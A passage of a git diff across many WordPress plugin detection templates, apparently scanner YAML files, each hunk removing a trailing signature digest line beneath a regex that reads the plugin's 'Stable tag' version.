490a0046304402200cabfbf8e977b1d1840d706300163a1c923bcfccaa89ed95e52cb849136f8afc022024d64c3bae9e11421fcbef3331565b368588fd8259f218caab0b0c270b9e484d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 8b2c7e6f6a..7e5b54c12c 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201f9b9f18004f0b61087af200764171bcad75f5db1028d340af7391706ff45de6022100fdad8fd3111dbcbc142005b139da3e2fb26827aa3e166986b0f6672f57adf165:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index e42d0e669f..59effd09f6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a9ee07ab06bae4d77bd40e9ac10438601aa055e67a2c9f5d665720ddbaebbd7802200dc6937b958e9082f1c66711849b356a7857af8594ae4f107a8110cae12c7469:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 9efa7d857f..833207dcff 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fdd2ef9265e93f6a28bdac58544894435a2a39c8705b2167af7dec08dfc9d790022100849843eea5d289a230c98fc235da386cb5a62328bdcf5f4497d49b110178d25c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 981dfa79aa..45260ccfba 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220228b2a457b8777059adc2fae06d13862ab6012ef1452668fc679f2d918400f3d0221008cc4f3c772d5d9b05524dbb3b31a57fcc0bedd03ef5a4e297df37f11aa7e979c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index c2738288a2..2131dbe751 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022018869ba013cac29cd76d47a2ea3c7e1b5ddb24dad6d23d2a556f287100159180022100ebc12134297869b30ce6c006bb63e4f175acec8aa675d03ad9b2aeb71e1734fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index ead5ada524..73d644c5e4 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ef53b0fbfaa8275e397d0d929f8c1758e7b6f1c85fef3794a7ade8d303b225820220079e3842b8a5085e19459f251a0333f7eda65d4f29f0e2a3eea82809e934e82c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index d758650fd9..64cfced6cf 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c75859e6d2ce07565d789b3f62bdf037b34123629fe1af28aa3788532b9deca3022017028fb9383e8d8cd2283d4e2215bac66db75f1393b940f126f05218980c1ff2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6297c82f7e..6f65d087e4 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c745b03ba1190d67a6b218de8ca928bdf54648dc81ee4b49a9c044664659bdf202210098b9d15d32dedffdfc39cde02691c5c58ad5015cd93e376161f33b17ff22501c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 075ace52a9..783cdd283d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202753b06023f1be7ecc2ce5d5f5f12bbdd40f90e7b762a733c572017ab88ea4f8022075b1aa7566b5b8ec87f1ef4731c689c1b9325c9dfe488b48479ffef77210be71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 36469b6ff3..05121854b3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022054c30ae704fc0c5888e2ef45ec935cd5ba5adc1fd149502f843f0e3806865dbe022100fc88fa2b7a7d5415e4d1d91aef5b7bac7eca97259fdfd33a97c4b1d1f7256b22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index e92d4d8f83..72f52edcd4 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b1173fd26c2fa31626c4b345dc889ee9053221b42bd8eed330a5ab45f306553c022100d71a1ed6291ef4d1bc555e69cabbd0d47abcef209e083367608a68300ed47370:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 9cefe94b61..4cf45ebd74 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009130d8395aab24212baaabc1bd263c002f5eb18d9f983d55e09718bc73a4e49702201c874b2509141eef84a96f81d4e63d48ac93eb8dbb1ed5308880d5466cf2579a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 19c957542c..3d6863e074 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cba5843debd607cc8adcda08556a27ada5be62cef250a06a6b286b4af38e3255022100cbeed8108335cf75f41b63227cb3a604d5d037d290b1607adfbd35e6de81b085:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 5860acd155..79e2813c5e 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100be28930f61b634e9c6133a43cfabfbed582108e237e6a17458f778c444e2fbda022039401231c22b99ec1321614f87d4e4a9572ab03aa2bc6071293f5988026e4b59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index 3c759e5add..ab9a0f1ae3 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201fe1f08adb9de7eada0175178e5b42ed39b24e2812afd9b9b60596e4865f92d2022013482e6e5c61572d3b9e5f5c8fefc764f32570faadd7ef73e2b8d9e44b5b0520:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index f87986fa4f..5d3adf7c27 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f3bf16bab7cc6486bca1fa963c0aa349894a9e1e7d293d14ad6c063446e9a7d4022100a9fa040c6769898d6de1c1cd30230ad9b4814e71ed9ad44b9a8aaff29ab88edf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index 0fb369d947..4a68323ae1 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c2a9cf0fb2694cd946e9027edf0415e5f64f5cf945fa86c443b91fb7ff63409d022100edf3453bda82386dc30acb4c03a483604cae16373307d9ec52550dbdda70d85a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 6270a4f5a5..16dfc8df5f 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a6fadcebb1553aa86edbc46b587bd6e5bfa33dc2a9997ec652e1ce787dbfb566022100c7969b5b5cce74ee2c47c05b948ba89a5386610f831aecbac91fea4e73b17d89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 508d325436..2ccd4dbce8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cb142aeb1ff33a9489feaf321ecd3244509c4aaaf0a5d89e0d7b2e44f070ae46022100ef912054593822b054a69859341249a560a11b3e432952c237ce7d1cdf83dd74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 8d55c87b25..02ceb224d1 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022000befb6ac214e56a6024cee4d54936c18300417bd30aeecab8e3b5542f6e492002201e5086e7f3595d1dd6428517817542c2e876b2f7e030bb6b254f02a57ff4ce3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index a250dac31e..367d587ce2 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009a9c7b62e87eb7d8e64a8796d028b3bc6cd7ba6c5162a1ae0d449d152a3991890220282f2e01c6d9241677da27cfcc4c18b8efe775820e40870e815283c7819b57b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 5bbf7b3870..feed730ee0 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022059600ebaa0c6d5d25bc76a1409cd420d15aed1bc432e76b94e85bcf9c619b6460220397eba9bcd8c4cb4862c856197a069ecbcff6aff7beb99831a4942d676c649aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e840c34202..9b2841e7ca 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220070441586de3af026cb899d397f6bfd6086f979abb6f300747497f8f2f0cc9230220045298955ea8a82d6a5038b0764ec7d01a8103d6d314c41c1df2a99b8fd89694:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 31f651d1ec..42be14c5df 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220076f4873cc3a28cae0c3fc7f5ff49d3b1345c440bac2c22ad619e675e824eaa6022100f343b78ee31339a12cbd2740d056a48395786e80334c8bb1d62dede8ad43c024:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 15ba746de9..4e0cd86c3f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f1550cbba9a35e54b605f3dcec2422afb135ba03bb513250859f19dd8f56d972022034ff2a26d196feb774eb098b2a4ee48c48d7f9982d6aa91db389648f29d5901d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 880635b959..59eadc5e6e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022026f1c8771a54a84a24c7805f1133ec6e087326c400506774810ee083e913bf860220188eae8b9559e1369911a50bbe5f4a4613f3f00362015b51e59bec383e42b82d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index ef31aa71cb..41f7a0075e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022035865cb808a25725a2c51aed1f04f668207c84e277491a2374ba69ae361823a8022038d017ad0e5a4db035243a624fd7551af152438aa9952ddaf02bfc84907a3ed6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7b93dd78a2..7e35a3fb4f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cdac166725f40d59bdb6c77c25373b0e32a1aa95027c6d638ace452a95a0a88c022100c930004e5692742acd4b8817076658c2dced4e93ec38db15e54aeb0f31a1ca80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index f73ed9e833..18c2a7586e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220206d2a6702633fc0ec4b0ddc213fe1bd5515b8693f9df89ca5f772ddd6d8195a0220126d0be37b1422b9da4a722dcfd56e5a011de860f3029d1c1cc4d66b7d616d2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index b0f70a36e9..6bc2aa78f9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200ff5f167fb0c7e24a52f6e4c51399179f427c18bcc421f2d03cef471a9c86cf6022100c0a17c9e18f0bb798727dec0bd5bd5ac95727b334a8b9f6f3fa78016647b08f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 8c1b9e3dc1..a43d3352a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022054418e7b21f9b273a887f6a641393bb10e51daa678bcf806bdab6e71388507390220432219b10318cf76bc889e2af3bb29415b87204f3a2f422d2ce8388a6ffb4c9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 832e45c7cf..e7db9944e4 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f140eca04450526be69df9d41ff321363a4ca7d9cf52300536baa669ad93e1f0022100f4bb47b9f810aff7de0ef0c4e490e128c47d4bddaa45c31d345b5859bfeb647e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index eebac18de1..268bd7b9df 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201544a6e20fb80f844e5b8beeb2adc257d36bc962f3fb546ae66aec80be1a96140220373231a59673a8347c4ee2f31d6d81a248e4a134cc95e88d4fa72a010531d955:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 61a21ec216..ed3161d27c 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022075c4855dfc42df5fc4df9bf8ad828f5fa5d6a32095506fbd2b339a048d852333022100a0e44437834841ed62013140ea3e1251a12973d3aad56286890a1e5c164a12b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index e780cba596..a1641d4632 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210097c30988c1e54010f544e56d3652b7fffe5947f9950ff3ed3ec444dcc8fa72da02207dfa968ea5322e8ff4e064a1cb056e21102f44be82d7f238af6512be6ba1cae4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 982a1bd8ab..3b6542683c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f103721f7b914444b0596825860e03a313bdfcd0c4b1d753160282a46e5232c5022053dd231e9325c470691a8fa2725d850554646da6ab4e937aaa202996a0e6852e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 098440f4ca..969c280ee1 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100edcf4d1dade562052c5e90cfec3d6edb039a3239c7c2501e46f00b28921a1806022064556c8d6439a32975e73b3be8daeb4a4acfb37420f6e605a5b6d0b2442521d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 15ae25e3aa..1c97c422e4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022049893a0dd341e232d0a09ec0516243cc8d018294a5620359f066c00846a84732022100d07ad8c986cba1b1c33e12762362c7fbe317e0607c6c61ccdbd7e8efe218970d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 4c1783e7c6..7d861cf06a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100879b7486503359e040615b93a3161f7a05d38971da54aec88032f78de5a34f0302205bca172f0e24bac4d0287d58355be1a66bfe249874490ea5af422c98000a4953:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 1c8a2c95d4..540d535ecc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022069627cb1f9e2e11e75a6bf5d77c421db20c663a8e9e05a7c9dc9f47a9792d72802202e2667217062a5d82493ef5c2e28931ef66097673984fb5efc6a8e423aceab9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index 23368a6323..f089ee37d3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022006dc2a2acfb6659cfced35bafc26e01969778ffdf4f2aa765aa7f921c54ac23c022021b40a2243ead7450711e52b5809e02eaf2794d169bcc55c21f539b286b7f0dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 76c259e7ba..d69709b8f9 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022001438ff7f23081da5f5aa74407b91a829973ed0f35a9e355d97a081655bbc0bc022100ae965608ad530269c7e14c0ec58ed9eb868e03c83cfc1d4aabe8ef7aff3557f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 1f63424096..f8903fa3db 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022070c5b505cc3b09c9fb593d252f2b47bbb7564f8ffa51a32602eacde1e46149e9022044c5187a56d819129710d1b6ca8721577108ec1f8ad08f4da2499dfcd2f20c1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 239a12c68b..ae2451ca38 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dc4d052630fa999f68390fd6554a22c779ddc40031c52aa255472f68a5d51fcf022100d61ae4f216bb23375c183b5f0594c00a0f4c1d352123c88189c381abb686332b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index e7f70d757f..dcc61d1255 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c97fdf7396edc3643d621ef27f637d40a20f35501550848e3d5ac276d420b8b5022071f42e4687ff2514fea8cb7606c95751f1fd59d12c441c33765cf6bed17ddbd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 93ef414e77..d1d2c1c1d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c67a888b63a21029b10528053b013ac6ce479d4a4e5cb6dee67fc58af1700c73022100c5923911e0aeecf1f302b2cf1a56e7af33b3b5b54c8cb644e62a3874c27f743e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 2d1eae3237..59a655c424 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206752c6cebd9d560ad72555726279365551ae3a2e12c88e031ad1c62b3200ab8002201a5be6ca72dd8a1966f80f9b9b8df6dc5ad676e0edeb33b134ee7e355ff77323:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 